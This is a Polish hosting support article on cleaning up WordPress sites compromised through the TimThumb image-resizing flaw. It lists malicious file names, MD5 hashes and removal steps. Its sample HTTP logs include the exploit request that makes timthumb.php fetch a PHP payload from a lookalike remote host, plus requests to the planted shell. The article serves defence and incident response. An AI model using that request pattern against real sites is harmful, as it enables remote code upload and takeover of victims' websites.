Włamanie do systemu WordPress: Narzędzie TimThumb

TimThumb to narzędzie używane przez kompozycje i wtyczki systemu WordPress do zmiany rozmiaru obrazów. W starszych wersjach tego narzędzia występuje luka w zabezpieczeniach pozwalająca przestępcy przesłać złośliwe („złe”) pliki z innej witryny. Pierwszy złośliwy plik z kolei otwiera furtkę do przesłania kolejnych na konto hostingowe.

Więcej informacji o włamaniach i sposobach radzenia sobie z nimi możesz uzyskać, korzystając z Jak postępować, gdy moja witryna padnie ofiarą ataku?.

Symptomy świadczące o dokonanym włamaniu

Oprócz symptomów omówionych w Jak postępować, gdy moja witryna padnie ofiarą ataku?, fakt przeprowadzenia ataku jest sygnalizowany przez obecność w katalogu wtyczek plików z nazwą o następujących wzorcach:

  • external_[md5 hash].php — na przykład: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — na przykład: 7eebe45bde5168488ac4010f0d65cea8.php

Przykłady potencjalnych skrótów md5 znajdziesz w części Sumy kontrolne MD5 znanych złośliwych plików tego artykułu pomocy.

Ponadto w katalogu głównym witryny możesz znaleźć następujące pliki (więcej informacji):

  • x.txt
  • logx.txt

Środki zaradcze

Konieczne jest usunięcie wszystkich zainfekowanych i złośliwych plików. Przed usunięciem czegokolwiek zalecamy utworzenie kopii zapasowej Twojej witryny (więcej informacji).

Lokalizowanie złośliwych plików

Złośliwe pliki przesłane z wykorzystaniem luki w zabezpieczeniach narzędzia TimThumb można standardowo znaleźć w następujących podkatalogach, znajdujących się w katalogach /theme i /plugin zawierających podatny na atak plik TimThumb.

  • /tmp
  • /cache
  • /images

Przykłady lokalizacji złośliwych plików:

[webroot]/wp-content/themes/[kompozycja z plikiem TimThumb podatnym na atak]/cache/images/

Przykłady nazw złośliwych plików znajdowanych w wyżej omówionych lokalizacjach:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

W plikach x.txt i logx.txt są zawarte informacje o dacie i godzinie utworzenia złośliwego pliku za pośrednictwem luki TimThumb, a także jego lokalizacji na koncie hostingowym. Są przydatne w weryfikowaniu, które pliki należy usunąć i gdzie można je znaleźć. Istnieje jednak duże prawdopodobieństwo, że wyżej wspomniane informacje nie będą obejmować pełnej listy plików koniecznych do usunięcia.

Przykład:

Dzień : Thu, 11 Apr 2013 06:21:15 -0700
Adres IP: X.X.X.X
Przeglądarka: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Adres URL: /wp-content/themes/[kompozycja z plikiem TimThumb podatnym na atak]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Pliki konieczne do usunięcia

Po utworzeniu kopii zapasowej swojej witryny usuń następujące pliki:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — na przykład: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — na przykład: 7eebe45bde5168488ac4010f0d65cea8.php
  • Inne wyszukane złośliwe pliki PHP ze skrótem md5 w nazwie.

Operację usuwania można przeprowadzić za pomocą klienta FTP (więcej informacji) albo menadżera plików dostępnego z poziomu panelu sterowania konta hostingowego (więcej informacji).

Dodatkowe niezbędne czynności:

  • Zaktualizuj wszystkie kompozycje i wtyczki do najnowszej wersji.
  • Zastąp każdy egzemplarz pliku TimThumb.php jego najnowszą wersją, którą można znaleźć tutaj.

Informacje techniczne

Przykłady dzienników HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[kompozycja z plikiem TimThumb podatnym na atak]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[kompozycja z plikiem TimThumb podatnym na atak]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[kompozycja z plikiem TimThumb podatnym na atak]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[kompozycja z plikiem TimThumb podatnym na atak]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Sumy kontrolne MD5 znanych złośliwych plików

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Inne złośliwe pliki

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Czy ten artykuł był pomocny?
Dziękujemy za przekazanie informacji. Aby porozmawiać z pracownikiem obsługi klienta, zadzwoń pod numer pomocy technicznej lub skorzystaj z opcji czatu (powyżej).
Cieszymy się, że udało się nam pomóc! Czy coś jeszcze możemy dla Ciebie zrobić?
Przykro nam z tego powodu. Powiedz nam, co było niezrozumiałe lub dlaczego nie udało się rozwiązać Twojego problemu.